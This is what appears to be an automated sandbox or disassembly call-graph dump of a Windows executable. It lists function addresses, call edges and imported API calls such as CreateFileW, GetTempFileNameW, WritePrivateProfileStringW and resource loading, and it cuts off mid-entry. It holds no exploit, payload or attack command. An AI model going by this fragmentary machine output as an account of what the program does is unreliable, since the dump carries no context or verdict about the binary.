40cf04 17 API calls 39209->39210 39211 40bc2e 39210->39211 39212 40bd43 39211->39212 39213 40b2cc 27 API calls 39211->39213 39214 40cc0c 4 API calls 39212->39214 39215 40bc40 39213->39215 39214->39199 39341 40ccf0 _wcsicmp 39215->39341 39217 40bc46 39217->39212 39218 40bc61 memset memset WideCharToMultiByte 39217->39218 39342 40103c strlen 39218->39342 39220 40bcc0 39221 40b273 27 API calls 39220->39221 39222 40bcd0 memcmp 39221->39222 39222->39212 39223 40bce2 39222->39223 39224 404423 37 API calls 39223->39224 39225 40bd10 39224->39225 39225->39212 39226 40bd3a LocalFree 39225->39226 39227 40bd1f memcpy 39225->39227 39226->39212 39227->39226 39228->38690 39402 4438b5 39229->39402 39231 44444c 39232 40b879 39231->39232 39416 415a6d 39231->39416 39232->38693 39232->38694 39235 444486 39237 4444b9 memcpy 39235->39237 39274 4444a4 39235->39274 39236 44469e 39236->39232 39471 443d90 110 API calls 39236->39471 39420 415258 39237->39420 39240 444524 39241 444541 39240->39241 39242 44452a 39240->39242 39423 444316 39241->39423 39457 416935 39242->39457 39246 444316 18 API calls 39247 444563 39246->39247 39248 444316 18 API calls 39247->39248 39249 44456f 39248->39249 39250 444316 18 API calls 39249->39250 39251 44457f 39250->39251 39251->39274 39437 432d4e 39251->39437 39254 444316 18 API calls 39255 4445b0 39254->39255 39441 41eed2 39255->39441 39257 4445cf 39258 4445d6 39257->39258 39259 4445ee 39257->39259 39262 416935 16 API calls 39258->39262 39465 43302c memset 39259->39465 39261 4445fa 39466 43302c memset 39261->39466 39262->39274 39264 444609 39265 416935 16 API calls 39264->39265 39264->39274 39266 444646 39265->39266 39467 434d4b 17 API calls 39266->39467 39470 4442e6 11 API calls 39274->39470 39528 438460 39275->39528 39277 40b8a4 39277->38700 39281 4251c4 39277->39281 39279 409a74 GetTempFileNameW 39278->39279 39280 409a66 GetWindowsDirectoryW 39278->39280 39279->38687 39280->39279 39622 424f07 39281->39622 39283 4251e4 39284 4251f7 39283->39284 39285 4251e8 39283->39285 39630 4250f8 39284->39630 39629 4446ea 11 API calls 39285->39629 39287 4251f2 39287->38725 39289 425209 39292 425249 39289->39292 39295 4250f8 126 API calls 39289->39295 39296 425287 39289->39296 39638 4384e9 134 API calls 39289->39638 39639 424f74 123 API calls 39289->39639 39292->39296 39640 424ff0 13 API calls 39292->39640 39295->39289 39642 415c7d 16 API calls 39296->39642 39297 425266 39297->39296 39641 415be9 memcpy 39297->39641 39299->38725 39300->38725 39301->38725 39302->38725 39303->38725 39304->38725 39305->38725 39306->38725 39307->38725 39308->38700 39309->38693 39310->38722 39343 4096c3 CreateFileW 39311->39343 39313 40cc34 39314 40cc3d GetFileSize 39313->39314 39315 40bbca 39313->39315 39316 40afcf 2 API calls 39314->39316 39315->39199 39323 40cf04 39315->39323 39317 40cc64 39316->39317 39344 40a2ef ReadFile 39317->39344 39319 40cc71 39345 40ab4a MultiByteToWideChar 39319->39345 39321 40cc95 CloseHandle 39322 40b04b ??3@YAXPAX 39321->39322 39322->39315 39324 40b633 free 39323->39324 39325 40cf14 39324->39325 39351 40b1ab free free 39325->39351 39327 40bbdd 39327->39199 39327->39204 39328 40cf1b 39328->39327 39330 40cfef 39328->39330 39352 40cd4b 39328->39352 39331 40cd4b 14 API calls 39330->39331 39331->39327 39333 40b633 free 39332->39333 39334 40cc15 39333->39334 39335 40aa04 free 39334->39335 39336 40cc1d 39335->39336 39401 40b1ab free free 39336->39401 39338 40b7d4 memset CreateFileW 39338->38680 39338->38681 39339->39207 39340->39209 39341->39217 39342->39220 39343->39313 39344->39319 39346 40ab93 39345->39346 39347 40ab6b 39345->39347 39346->39321 39348 40a9ce 4 API calls 39347->39348 39349 40ab74 39348->39349 39350 40ab7c MultiByteToWideChar 39349->39350 39350->39346 39351->39328 39353 40cd7b 39352->39353 39386 40aa29 39353->39386 39355 40cef5 39356 40aa04 free 39355->39356 39357 40cefd 39356->39357 39357->39328 39359 40aa29 6 API calls 39360 40ce1d 39359->39360 39361 40aa29 6 API calls 39360->39361 39362 40ce3e 39361->39362 39363 40ce6a 39362->39363 39394 40abb7 wcslen memmove 39362->39394 39364 40ce9f 39363->39364 39397 40abb7 wcslen memmove 39363->39397 39367 40a8d0 7 API calls 39364->39367 39370 40ceb5 39367->39370 39368 40ce56 39395 40aa71 wcslen 39368->39395 39369 40ce8b 39398 40aa71 wcslen 39369->39398 39376 40a8d0 7 API calls 39370->39376 39373 40ce5e 39396 40abb7 wcslen memmove 39373->39396 39374 40ce93 39399 40abb7 wcslen memmove 39374->39399 39378 40cecb 39376->39378 39400 40d00b malloc memcpy free free 39378->39400 39380 40cedd 39381 40aa04 free 39380->39381 39382 40cee5 39381->39382 39383 40aa04 free 39382->39383 39384 40ceed 39383->39384 39385 40aa04 free 39384->39385 39385->39355 39387 40aa33 39386->39387 39393 40aa63 39386->39393 39388 40aa44 39387->39388 39389 40aa38 wcslen 39387->39389 39390 40a9ce malloc memcpy free free 39388->39390 39389->39388 39391 40aa4d 39390->39391 39392 40aa51 memcpy 39391->39392 39391->39393 39392->39393 39393->39355 39393->39359 39394->39368 39395->39373 39396->39363 39397->39369 39398->39374 39399->39364 39400->39380 39401->39338 39403 4438d0 39402->39403 39413 4438c9 39402->39413 39472 415378 memcpy memcpy 39403->39472 39413->39231 39417 415a77 39416->39417 39418 415a8d 39417->39418 39419 415a7e memset 39417->39419 39418->39235 39419->39418 39421 4438b5 11 API calls 39420->39421 39422 41525d 39421->39422 39422->39240 39424 444328 39423->39424 39425 444423 39424->39425 39426 44434e 39424->39426 39473 4446ea 11 API calls 39425->39473 39427 432d4e 3 API calls 39426->39427 39429 44435a 39427->39429 39431 444375 39429->39431 39436 44438b 39429->39436 39430 432d4e 3 API calls 39432 4443ec 39430->39432 39433 416935 16 API calls 39431->39433 39434 444381 39432->39434 39435 416935 16 API calls 39432->39435 39433->39434 39434->39246 39435->39434 39436->39430 39438 432d58 39437->39438 39440 432d65 39437->39440 39474 432cc4 memset memset memcpy 39438->39474 39440->39254 39442 41eee2 39441->39442 39443 415a6d memset 39442->39443 39444 41ef23 39443->39444 39445 415a6d memset 39444->39445 39456 41ef2d 39444->39456 39446 41ef42 39445->39446 39450 41ef49 39446->39450 39475 41b7d9 39446->39475 39448 41ef66 39449 41ef74 memset 39448->39449 39448->39450 39451 41ef91 39449->39451 39454 41ef9e 39449->39454 39450->39456 39493 41b321 100 API calls 39450->39493 39489 41519d 39451->39489 39454->39450 39492 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39454->39492 39456->39257 39458 41693e 39457->39458 39464 41698e 39457->39464 39460 41694c 39458->39460 39507 422fd1 memset 39458->39507 39460->39464 39508 4165a0 39460->39508 39464->39274 39465->39261 39466->39264 39470->39236 39471->39232 39473->39434 39474->39440 39481 41b812 39475->39481 39476 415a6d memset 39477 41b8c2 39476->39477 39478 41b980 39477->39478 39479 41b902 memcpy memcpy memcpy memcpy memcpy 39477->39479 39484 41b849 39477->39484 39486 41b9ad 39478->39486 39495 4151e3 39478->39495 39479->39478 39481->39484 39488 41b884 39481->39488 39494 444706 11 API calls 39481->39494 39484->39448 39486->39484 39488->39476 39488->39484 39499 4175ed 39489->39499 39492->39450 39493->39456 39494->39488 39497 41837f 54 API calls 39495->39497 39507->39460 39514 415cfe 39508->39514 39513 422b84 15 API calls 39513->39464 39517 415d23 __aullrem __aulldvrm 39514->39517 39521 41628e 39514->39521 39515 4163ca 39516 416422 10 API calls 39515->39516 39516->39521 39517->39515 39518 416172 memset 39517->39518 39519 416422 10 API calls 39517->39519 39520 415cb9 10 API calls 39517->39520 39517->39521 39518->39517 39519->39517 39520->39517 39522 416520 39521->39522 39523 416574 39522->39523 39524 416527 39522->39524 39523->39464 39523->39513 39524->39523 39525 415700 10 API calls 39524->39525 39526 416544 39524->39526 39525->39526 39526->39523 39527 416561 memcpy 39526->39527 39527->39523 39540 41703f 39528->39540 39530 43847a 39531 43848a 39530->39531 39532 43847e 39530->39532 39547 438270 39531->39547 39577 4446ea 11 API calls 39532->39577 39537 4384bb 39538 438270 133 API calls 39537->39538 39539 438488 39538->39539 39539->39277 39541 417044 39540->39541 39542 41705c 39540->39542 39546 417055 39541->39546 39579 416760 11 API calls 39541->39579 39543 417075 39542->39543 39580 41707a 11 API calls 39542->39580 39543->39530 39546->39530 39581 415a91 39547->39581 39549 43828d 39550 438297 39549->39550 39551 438341 39549->39551 39553 4382d6 39549->39553 39621 415c7d 16 API calls 39550->39621 39585 44358f 39551->39585 39556 4382fb 39553->39556 39557 4382db 39553->39557 39555 438458 39555->39539 39578 424f26 122 API calls 39555->39578 39617 415c23 memcpy 39556->39617 39558 416935 16 API calls 39557->39558 39560 4382e9 39558->39560 39616 415c7d 16 API calls 39560->39616 39561 438305 39564 44358f 19 API calls 39561->39564 39566 438318 39561->39566 39563 438373 39570 438383 39563->39570 39618 4300e8 memset memset memcpy 39563->39618 39564->39566 39566->39563 39611 43819e 39566->39611 39568 4383f5 39573 438404 39568->39573 39574 43841c 39568->39574 39569 4383cd 39569->39568 39620 42453e 122 API calls 39569->39620 39570->39569 39619 415c23 memcpy 39570->39619 39576 416935 16 API calls 39573->39576 39575 416935 16 API calls 39574->39575 39575->39550 39576->39550 39577->39539 39578->39537 39579->39546 39580->39541 39582 415a9d 39581->39582 39583 415ab3 39582->39583 39584 415aa4 memset 39582->39584 39583->39549 39584->39583 39586 4435be 39585->39586 39588 443676 39586->39588 39591 4436ce 39586->39591 39594 442ff8 19 API calls 39586->39594 39595 44366c 39586->39595 39609 44360c 39586->39609 39587 443758 39590 441409 memset 39587->39590 39599 443775 39587->39599 39588->39587 39589 443737 39588->39589 39592 442ff8 19 API calls 39588->39592 39593 442ff8 19 API calls 39589->39593 39590->39587 39597 4165ff 11 API calls 39591->39597 39592->39589 39593->39587 39594->39586 39598 4169a7 11 API calls 39595->39598 39596 4437be 39600 416760 11 API calls 39596->39600 39601 4437de 39596->39601 39597->39588 39598->39588 39599->39596 39605 415c56 11 API calls 39599->39605 39600->39601 39602 42463b memset memcpy 39601->39602 39604 443801 39601->39604 39602->39604 39603 443826 39607 43bd08 memset 39603->39607 39604->39603 39606 43024d memset 39604->39606 39605->39596 39606->39603 39608 443837 39607->39608 39608->39609 39610 43024d memset 39608->39610 39609->39566 39610->39608 39612 438246 39611->39612 39614 4381ba 39611->39614 39612->39563 39613 41f432 109 API calls 39613->39614 39614->39612 39614->39613 39615 41f638 103 API calls 39614->39615 39615->39614 39616->39550 39617->39561 39618->39570 39619->39569 39620->39568 39621->39555 39623 424f1f 39622->39623 39624 424f0c 39622->39624 39644 424eea 11 API calls 39623->39644 39643 416760 11 API calls 39624->39643 39627 424f18 39627->39283 39628 424f24 39628->39283 39629->39287 39631 425108 39630->39631 39637 42510d 39630->39637 39677 424f74 123 API calls 39631->39677 39634 42516e 39678 415c7d 16 API calls 39634->39678 39635 425115 39635->39289 39637->39635 39645 42569b 39637->39645 39638->39289 39639->39289 39640->39297 39641->39296 39642->39287 39643->39627 39644->39628 39655 4256f1 39645->39655 39673 4259c2 39645->39673 39650 4260dd 39690 424251 119 API calls 39650->39690 39651 429a4d 39658 429a66 39651->39658 39659 429a9b 39651->39659 39655->39651 39656 422aeb memset memcpy memcpy 39655->39656 39661 4260a1 39655->39661 39670 4259da 39655->39670 39671 429ac1 39655->39671 39655->39673 39676 425a38 39655->39676 39679 4227f0 memset memcpy 39655->39679 39680 422b84 15 API calls 39655->39680 39681 422b5d memset memcpy memcpy 39655->39681 39682 422640 13 API calls 39655->39682 39684 4241fc 11 API calls 39655->39684 39685 42413a 89 API calls 39655->39685 39656->39655 39691 415c56 11 API calls 39658->39691 39660 429a96 39659->39660 39693 416760 11 API calls 39659->39693 39694 424251 119 API calls 39660->39694 39688 415c56 11 API calls 39661->39688 39663 429a7a 39692 416760 11 API calls 39663->39692 39689 416760 11 API calls 39670->39689 39672 425ad6 39671->39672 39695 415c56 11 API calls 39671->39695 39672->39634 39673->39672 39683 415c56 11 API calls 39673->39683 39676->39673 39686 422640 13 API calls 39676->39686 39687 4226e0 12 API calls 39676->39687 39677->39637 39678->39635 39679->39655 39680->39655 39681->39655 39682->39655 39683->39670 39684->39655 39685->39655 39686->39676 39687->39676 39688->39670 39689->39650 39690->39672 39691->39663 39692->39660 39693->39660 39694->39671 39695->39670 39696->38760 39697->38768 39698 44dea5 39699 44deb5 FreeLibrary 39698->39699 39700 44dec3 39698->39700 39699->39700 39701 4147f3 39704 414561 39701->39704 39703 414813 39705 41456d 39704->39705 39706 41457f GetPrivateProfileIntW 39704->39706 39709 4143f1 memset _itow WritePrivateProfileStringW 39705->39709 39706->39703 39708 41457a 39708->39703 39709->39708 39710 44def7 39711 44df07 39710->39711 39712 44df00 ??3@YAXPAX 39710->39712 39713 44df17 39711->39713 39714 44df10 ??3@YAXPAX 39711->39714 39712->39711 39715 44df27 39713->39715 39716 44df20 ??3@YAXPAX 39713->39716 39714->39713 39717 44df37 39715->39717 39718 44df30 ??3@YAXPAX 39715->39718 39716->39715 39718->39717 39719 4287c1 39720 4287d2 39719->39720 39721 429ac1 39719->39721 39722 428818 39720->39722 39723 42881f 39720->39723 39737 425711 39720->39737 39733 425ad6 39721->39733 39789 415c56 11 API calls 39721->39789 39756 42013a 39722->39756 39784 420244 96 API calls 39723->39784 39727 4260dd 39783 424251 119 API calls 39727->39783 39731 4259da 39782 416760 11 API calls 39731->39782 39734 429a4d 39740 429a66 39734->39740 39741 429a9b 39734->39741 39737->39721 39737->39731 39737->39734 39738 422aeb memset memcpy memcpy 39737->39738 39743 4260a1 39737->39743 39752 4259c2 39737->39752 39755 425a38 39737->39755 39772 4227f0 memset memcpy 39737->39772 39773 422b84 15 API calls 39737->39773 39774 422b5d memset memcpy memcpy 39737->39774 39775 422640 13 API calls 39737->39775 39777 4241fc 11 API calls 39737->39777 39778 42413a 89 API calls 39737->39778 39738->39737 39785 415c56 11 API calls 39740->39785 39742 429a96 39741->39742 39787 416760 11 API calls 39741->39787 39788 424251 119 API calls 39742->39788 39781 415c56 11 API calls 39743->39781 39745 429a7a 39786 416760 11 API calls 39745->39786 39752->39733 39776 415c56 11 API calls 39752->39776 39755->39752 39779 422640 13 API calls 39755->39779 39780 4226e0 12 API calls 39755->39780 39757 42014c 39756->39757 39760 420151 39756->39760 39799 41e466 96 API calls 39757->39799 39759 420162 39759->39737 39760->39759 39761 4201b3 39760->39761 39762 420229 39760->39762 39763 4201b8 39761->39763 39764 4201dc 39761->39764 39762->39759 39765 41fd5e 85 API calls 39762->39765 39790 41fbdb 39763->39790 39764->39759 39769 4201ff 39764->39769 39796 41fc4c 39764->39796 39765->39759 39769->39759 39771 42013a 96 API calls 39769->39771 39771->39759 39772->39737 39773->39737 39774->39737 39775->39737 39776->39731 39777->39737 39778->39737 39779->39755 39780->39755 39781->39731 39782->39727 39783->39733 39784->39737 39785->39745 39786->39742 39787->39742 39788->39721 39789->39731 39791 41fbf8 39790->39791 39794 41fbf1 39790->39794 39804 41ee26 39791->39804 39795 41fc39 39794->39795 39814 4446ce 11 API calls 39794->39814 39795->39759 39800 41fd5e 39795->39800 39797 41ee6b 85 API calls 39796->39797 39798 41fc5d 39797->39798 39798->39764 39799->39760 39801 41fd65 39800->39801 39802 41fdab 39801->39802 39803 41fbdb 85 API calls 39801->39803 39802->39759 39803->39801 39805 41ee41 39804->39805 39806 41ee32 39804->39806 39815 41edad 39805->39815 39818 4446ce 11 API calls 39806->39818 39810 41ee3c 39810->39794 39812 41ee58 39812->39810 39820 41ee6b 39812->39820 39814->39795 39824 41be52 39815->39824 39818->39810 39819 41eb85 11 API calls 39819->39812 39821 41ee70 39820->39821 39822 41ee78 39820->39822 39862 41bf99 85 API calls 39821->39862 39822->39810 39825 41be6f 39824->39825 39826 41be5f 39824->39826 39831 41be8c 39825->39831 39856 418c63 memset memset 39825->39856 39855 4446ce 11 API calls 39826->39855 39828 41be69 39828->39810 39828->39819 39831->39828 39832 41bf3a 39831->39832 39833 41bed1 39831->39833 39836 41bee7 39831->39836 39859 4446ce 11 API calls 39832->39859 39835 41bef0 39833->39835 39838 41bee2 39833->39838 39835->39836 39837 41bf01 39835->39837 39836->39828 39860 41a453 85 API calls 39836->39860 39839 41bf24 memset 39837->39839 39841 41bf14 39837->39841 39857 418a6d memset memcpy memset 39837->39857 39845 41ac13 39838->39845 39839->39828 39858 41a223 memset memcpy memset 39841->39858 39844 41bf20 39844->39839 39846 41ac52 39845->39846 39847 41ac3f memset 39845->39847 39850 41ac6a 39846->39850 39861 41dc14 19 API calls 39846->39861 39848 41acd9 39847->39848 39848->39836 39851 41519d 6 API calls 39850->39851 39852 41aca1 39850->39852 39851->39852 39852->39848 39853 41acc0 memset 39852->39853 39854 41accd memcpy 39852->39854 39853->39848 39854->39848 39855->39828 39856->39831 39857->39841 39858->39844 39859->39836 39861->39850 39862->39822 39863 417bc5 39865 417c61 39863->39865 39869 417bda 39863->39869 39864 417bf6 UnmapViewOfFile CloseHandle 39864->39864 39864->39869 39867 417c2c 39867->39869 39875 41851e 18 API calls 39867->39875 39869->39864 39869->39865 39869->39867 39870 4175b7 39869->39870 39871 4175d6 CloseHandle 39870->39871 39872 4175c8 39871->39872 39873 4175df 39871->39873 39872->39873 39874 4175ce Sleep 39872->39874 39873->39869 39874->39871 39875->39867 39876 4152c6 malloc 39877 4152e2 39876->39877 39878 4152ef 39876->39878 39880 416760 11 API calls 39878->39880 39880->39877 39881 4148b6 FindResourceW 39882 4148f9 39881->39882 39883 4148cf SizeofResource 39881->39883 39883->39882 39884 4148e0 LoadResource 39883->39884 39884->39882 39885 4148ee LockResource 39884->39885 39885->39882 39886 441b3f 39896 43a9f6 39886->39896 39888 441b61 40069 4386af memset 39888->40069 39890 44189a 39891 4418e2 39890->39891 39893 442bd4 39890->39893 39892 4418ea 39891->39892 40070 4414a9 12 API calls 39891->40070 39893->39892 40071 441409 memset 39893->40071 39897 43aa20 39896->39897 39904 43aadf 39896->39904 39898 43aa34 memset 39897->39898 39897->39904 39899 43aa56 39898->39899 39900 43aa4d 39898->39900 40072 43a6e7 39899->40072 40080 42c02e memset 39900->40080 39904->39888 39906 43aad3 40082 4169a7 11 API calls 39906->40082 39907 43aaae 39907->39904 39907->39906 39922 43aae5 39907->39922 39908 43ac18 39911 43ac47 39908->39911 40084 42bbd5 memcpy memcpy memcpy memset memcpy 39908->40084 39912 43aca8 39911->39912 40085 438eed 16 API calls 39911->40085 39916 43acd5 39912->39916 40087 4233ae 11 API calls 39912->40087 39915 43ac87 40086 4233c5 16 API calls 39915->40086 40088 423426 11 API calls 39916->40088 39920 43ace1 40089 439811 162 API calls 39920->40089 39921 43a9f6 160 API calls 39921->39922 39922->39904 39922->39908 39922->39921 40083 439bbb 22 API calls 39922->40083 39924 43acfd 39929 43ad2c 39924->39929 40090 438eed 16 API calls 39924->40090 39926 43ad19 40091 4233c5 16 API calls 39926->40091 39928 43ad58 40092 44081d 162 API calls 39928->40092 39929->39928 39932 43add9 39929->39932 39932->39932 40096 423426 11 API calls 39932->40096 39933 43ae3a memset 39934 43ae73 39933->39934 40097 42e1c0 146 API calls 39934->40097 39935 43adab 40094 438c4e 162 API calls 39935->40094 39936 43ad6c 39936->39904 39936->39935 40093 42370b memset memcpy memset 39936->40093 39940 43adcc 40095 440f84 12 API calls 39940->40095 39941 43ae96 40098 42e1c0 146 API calls 39941->40098 39944 43aea8 39947 43aec1 39944->39947 40099 42e199 146 API calls 39944->40099 39946 43af00 39946->39904 39951 43af1a 39946->39951 39952 43b3d9 39946->39952 39947->39946 40100 42e1c0 146 API calls 39947->40100 39948 43add4 39953 43b60f 39948->39953 40159 438f86 16 API calls 39948->40159 40101 438eed 16 API calls 39951->40101 39957 43b3f6 39952->39957 39962 43b4c8 39952->39962 39953->39904 40160 4393a5 17 API calls 39953->40160 39956 43af2f 40102 4233c5 16 API calls 39956->40102 40142 432878 12 API calls 39957->40142 39959 43af51 40103 423426 11 API calls 39959->40103 39961 43b4f2 40149 43a76c 21 API calls 39961->40149 39962->39961 40148 42bbd5 memcpy memcpy memcpy memset memcpy 39962->40148 39964 43af7d 40104 423426 11 API calls 39964->40104 39968 43af94 40105 423330 11 API calls 39968->40105 39969 43b529 40150 44081d 162 API calls 39969->40150 39970 43b462 40144 423330 11 API calls 39970->40144 39974 43b544 39978 43b55c 39974->39978 40151 42c02e memset 39974->40151 39975 43b428 39975->39970 40143 432b60 16 API calls 39975->40143 39976 43afca 40106 423330 11 API calls 39976->40106 39977 43b47e 39980 43b497 39977->39980 40145 42374a memcpy memset memcpy memcpy memcpy 39977->40145 40152 43a87a 162 API calls 39978->40152 40146 4233ae 11 API calls 39980->40146 39983 43afdb 40107 4233ae 11 API calls 39983->40107 39986 43b4b1 40147 423399 11 API calls 39986->40147 39988 43b56c 39991 43b58a 39988->39991 40153 423330 11 API calls 39988->40153 39990 43afee 40108 44081d 162 API calls 39990->40108 40154 440f84 12 API calls 39991->40154 39992 43b4c1 40156 42db80 162 API calls 39992->40156 39997 43b592 40155 43a82f 16 API calls 39997->40155 40000 43b5b4 40157 438c4e 162 API calls 40000->40157 40002 43b5cf 40158 42c02e memset 40002->40158 40004 43b005 40004->39904 40009 43b01f 40004->40009 40109 42d836 162 API calls 40004->40109 40005 43b1ef 40119 4233c5 16 API calls 40005->40119 40007 43b212 40120 423330 11 API calls 40007->40120 40009->40005 40117 423330 11 API calls 40009->40117 40118 42d71d 162 API calls 40009->40118 40011 43b087 40110 4233ae 11 API calls 40011->40110 40014 43b22a 40121 42ccb5 11 API calls 40014->40121 40017 43b23f 40122 4233ae 11 API calls 40017->40122 40018 43b10f 40113 423330 11 API calls 40018->40113 40020 43b257 40123 4233ae 11 API calls 40020->40123 40024 43b129 40114 4233ae 11 API calls 40024->40114 40025 43b26e 40124 4233ae 11 API calls 40025->40124 40028 43b09a 40028->40018 40111 42cc15 19 API calls 40028->40111 40112 4233ae 11 API calls 40028->40112 40030 43b282 40125 43a87a 162 API calls 40030->40125 40031 43b13c 40115 440f84 12 API calls 40031->40115 40033 43b29d 40126 423330 11 API calls 40033->40126 40036 43b15f 40116 4233ae 11 API calls 40036->40116 40037 43b2af 40039 43b2b8 40037->40039 40040 43b2ce 40037->40040 40127 4233ae 11 API calls 40039->40127 40128 440f84 12 API calls 40040->40128 40043 43b2c9 40130 4233ae 11 API calls 40043->40130 40044 43b2da 40129 42370b memset memcpy memset 40044->40129 40047 43b2f9 40131 423330 11 API calls 40047->40131 40049 43b30b 40132 423330 11 API calls 40049->40132 40051 43b325 40133 423399 11 API calls 40051->40133 40053 43b332 40134 4233ae 11 API calls 40053->40134 40055 43b354 40135 423399 11 API calls 40055->40135 40057 43b364 40136 43a82f 16 API calls 40057->40136 40059 43b370 40137 42db80 162 API calls 40059->40137 40061 43b380 40138 438c4e 162 API calls 40061->40138 40063 43b39e 40139 423399 11 API calls 40063->40139 40065 43b3ae 40140 43a76c 21 API calls 40065->40140 40067 43b3c3 40141 423399 11 API calls 40067->40141 40069->39890 40070->39892 40071->39893 40073 43a6f5 40072->40073 40074 43a765 40072->40074 40073->40074 40161 42a115 40073->40161 40074->39904 40081 4397fd memset 40074->40081 40078 43a73d 40078->40074 40079 42a115 146 API calls 40078->40079 40079->40074 40080->39899 40081->39907 40082->39904 40083->39922 40084->39911 40085->39915 40086->39912 40087->39916 40088->39920 40089->39924 40090->39926 40091->39929 40092->39936 40093->39935 40094->39940 40095->39948 40096->39933 40097->39941 40098->39944 40099->39947 40100->39947 40101->39956 40102->39959 40103->39964 40104->39968 40105->39976 40106->39983 40107->39990 40108->40004 40109->40011 40110->40028 40111->40028 40112->40028 40113->40024 40114->40031 40115->40036 40116->40009 40117->40009 40118->40009 40119->40007 40120->40014 40121->40017 40122->40020 40123->40025 40124->40030 40125->40033 40126->40037 40127->40043 40128->40044 40129->40043 40130->40047 40131->40049 40132->40051 40133->40053 40134->40055 40135->40057 40136->40059 40137->40061 40138->40063 40139->40065 40140->40067 40141->39948 40142->39975 40143->39970 40144->39977 40145->39980 40146->39986 40147->39992 40148->39961 40149->39969 40150->39974 40151->39978 40152->39988 40153->39991 40154->39997 40155->39992 40156->40000 40157->40002 40158->39948 40159->39953 40160->39904 40162 42a175 40161->40162 40164 42a122 40161->40164 40162->40074 40167 42b13b 146 API calls 40162->40167 40164->40162 40165 42a115 146 API calls 40164->40165 40168 43a174 40164->40168 40192 42a0a8 146 API calls 40164->40192 40165->40164 40167->40078 40182 43a196 40168->40182 40183 43a19e 40168->40183 40169 43a306 40169->40182 40208 4388c4 14 API calls 40169->40208 40172 42a115 146 API calls 40172->40183 40173 415a91 memset 40173->40183 40174 43a642 40174->40182 40212 4169a7 11 API calls 40174->40212 40178 43a635 40211 42c02e memset 40178->40211 40182->40164 40183->40169 40183->40172 40183->40173 40183->40182 40193 42ff8c 40183->40193 40201 4165ff 40183->40201 40204 439504 13 API calls 40183->40204 40205 4312d0 146 API calls 40183->40205 40206 42be4c memcpy memcpy memcpy memset memcpy 40183->40206 40207 43a121 11 API calls 40183->40207 40185 42bf4c 14 API calls 40187 43a325 40185->40187 40186 4169a7 11 API calls 40186->40187 40187->40174 40187->40178 40187->40182 40187->40185 40187->40186 40188 42b5b5 memset memcpy 40187->40188 40191 4165ff 11 API calls 40187->40191 40209 42b63e 14 API calls 40187->40209 40210 42bfcf memcpy 40187->40210 40188->40187 40191->40187 40192->40164 40213 43817e 40193->40213 40195 42ff99 40196 42ffe3 40195->40196 40197 42ffd0 40195->40197 40200 42ff9d 40195->40200 40218 4169a7 11 API calls 40196->40218 40217 4169a7 11 API calls 40197->40217 40200->40183 40202 4165a0 11 API calls 40201->40202 40203 41660d 40202->40203 40203->40183 40204->40183 40205->40183 40206->40183 40207->40183 40208->40187 40209->40187 40210->40187 40211->40174 40212->40182 40214 438187 40213->40214 40216 438192 40213->40216 40219 4380f6 40214->40219 40216->40195 40217->40200 40218->40200 40221 43811f 40219->40221 40220 438164 40220->40216 40221->40220 40224 437e5e 40221->40224 40247 4300e8 memset memset memcpy 40221->40247 40248 437d3c 40224->40248 40226 437eb3 40226->40221 40227 437ea9 40227->40226 40233 437f22 40227->40233 40263 41f432 40227->40263 40230 437f06 40310 415c56 11 API calls 40230->40310 40232 437f95 40311 415c56 11 API calls 40232->40311 40234 437f7f 40233->40234 40235 432d4e 3 API calls 40233->40235 40234->40232 40236 43802b 40234->40236 40235->40234 40238 4165ff 11 API calls 40236->40238 40239 438054 40238->40239 40274 437371 40239->40274 40242 43806b 40243 438094 40242->40243 40312 42f50e 137 API calls 40242->40312 40244 437fa3 40243->40244 40313 4300e8 memset memset memcpy 40243->40313 40244->40226 40314 41f638 103 API calls 40244->40314 40247->40221 40249 437d69 40248->40249 40252 437d80 40248->40252 40315 437ccb 11 API calls 40249->40315 40251 437d76 40251->40227 40252->40251 40253 437da3 40252->40253 40256 437d90 40252->40256 40255 438460 133 API calls 40253->40255 40259 437dcb 40255->40259 40256->40251 40319 437ccb 11 API calls 40256->40319 40257 437de8 40318 424f26 122 API calls 40257->40318 40259->40257 40316 444283 13 API calls 40259->40316 40261 437dfc 40317 437ccb 11 API calls 40261->40317 40264 41f54d 40263->40264 40270 41f44f 40263->40270 40265 41f466 40264->40265 40349 41c635 memset memset 40264->40349 40265->40230 40265->40233 40270->40265 40272 41f50b 40270->40272 40320 41f1a5 40270->40320 40345 41c06f memcmp 40270->40345 40346 41f3b1 89 API calls 40270->40346 40347 41f398 85 API calls 40270->40347 40272->40264 40272->40265 40348 41c295 85 API calls 40272->40348 40275 41703f 11 API calls 40274->40275 40276 437399 40275->40276 40277 43739d 40276->40277 40280 4373ac 40276->40280 40350 4446ea 11 API calls 40277->40350 40279 4373a7 40279->40242 40281 416935 16 API calls 40280->40281 40282 4373ca 40281->40282 40283 438460 133 API calls 40282->40283 40288 4251c4 136 API calls 40282->40288 40292 415a91 memset 40282->40292 40295 43758f 40282->40295 40307 437584 40282->40307 40309 437d3c 134 API calls 40282->40309 40351 425433 13 API calls 40282->40351 40352 425413 17 API calls 40282->40352 40353 42533e 16 API calls 40282->40353 40354 42538f 16 API calls 40282->40354 40355 42453e 122 API calls 40282->40355 40283->40282 40284 4375bc 40358 415c7d 16 API calls 40284->40358 40287 4375d2 40287->40279 40359 4442e6 11 API calls 40287->40359 40288->40282 40290 4375e2 40290->40279 40360 444283 13 API calls 40290->40360 40292->40282 40356 42453e 122 API calls 40295->40356 40298 4375f4 40301 437620 40298->40301 40302 43760b 40298->40302 40300 43759f 40303 416935 16 API calls 40300->40303 40305 416935 16 API calls 40301->40305 40361 444283 13 API calls 40302->40361 40303->40307 40305->40279 40307->40284 40357 42453e 122 API calls 40307->40357 40308 437612 memcpy 40308->40279 40309->40282 40310->40226 40311->40244 40312->40243 40313->40244 40314->40226 40315->40251 40316->40261 40317->40257 40318->40251 40319->40251 40321 41bc3b 100 API calls 40320->40321 40322 41f1b4 40321->40322 40323 41edad 85 API calls 40322->40323 40330 41f282 40322->40330 40324 41f1cb 40323->40324 40325 41f1f5 memcmp 40324->40325 40326 41f20e 40324->40326 40324->40330 40325->40326 40327 41f21b memcmp 40326->40327 40326->40330 40328 41f326 40327->40328 40331 41f23d 40327->40331 40329 41ee6b 85 API calls 40328->40329 40328->40330 40329->40330 40330->40270 40331->40328 40332 41f28e memcmp 40331->40332 40334 41c8df 55 API calls 40331->40334 40332->40328 40333 41f2a9 40332->40333 40333->40328 40336 41f308 40333->40336 40337 41f2d8 40333->40337 40335 41f269 40334->40335 40335->40328 40338 41f287 40335->40338 40339 41f27a 40335->40339 40336->40328 40343 4446ce 11 API calls 40336->40343 40340 41ee6b 85 